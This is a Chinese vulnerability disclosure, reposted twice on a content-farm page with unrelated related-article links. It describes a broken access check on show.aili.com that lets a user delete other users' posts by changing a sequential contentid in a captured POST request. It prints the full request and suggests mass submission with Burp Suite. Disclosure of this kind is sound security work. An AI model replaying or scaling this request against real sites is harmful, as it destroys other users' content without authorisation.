爱丽网越权之任意用户信息删除(通用2篇)
篇1:爱丽网越权之任意用户信息删除
1.注册两枚用户,各发布一条信息;
2.点击删除一个用户发布的信息,抓包得到如下数据;
POST /index.php HTTP/1.1
Host: show.aili.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/0101 Firefox/21.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: show.aili.com/index.php?m=member&s=2
Content-Length: 48
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
m=content&c=index&a=delcontent&contentid=7368892
3.我们获取另一个用户发布的信息ID;
4.把上面contentid值替换成“7368894”并提交,之后返回该用户页面刷新,发布的信息被成功删除;
PS:我们注意到contentid值是很有规律的,所以攻击者可使用burpsuite大量提交请求,可删除用户用户发布的信息!!
修复方案:
严格校验用户身份
篇2:爱丽网越权之任意用户信息删除
2.点击删除一个用户发布的信息,抓包得到如下数据;
POST /index.php HTTP/1.1
Host: show.aili.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/0101 Firefox/21.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: show.aili.com/index.php?m=member&s=2
Content-Length: 48
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
m=content&c=index&a=delcontent&contentid=7368892
3.我们获取另一个用户发布的信息ID;
4.把上面contentid值替换成“7368894”并提交,之后返回该用户页面刷新,发布的信息被成功删除;
PS:我们注意到contentid值是很有规律的,所以攻击者可使用burpsuite大量提交请求,可删除用户用户发布的信息!!
修复方案:
【爱丽网越权之任意用户信息删除】相关文章:
行政法越权原则论文04-20
论越权担保之效力及债权人审查义务——以“招商银行与振邦股份合同纠纷案”等为例09-10
论公司对外越权担保的合同效力及责任承担09-10
爱丽丝口号04-12
爱丽丝·门罗09-13
以爱丽舍之名05-25
爱丽丝梦游仙境06-11
爱丽丝梦游仙境影评06-05
爱丽丝勇闯蛋糕店作文04-16
《爱丽丝漫游奇境》阅读笔记05-14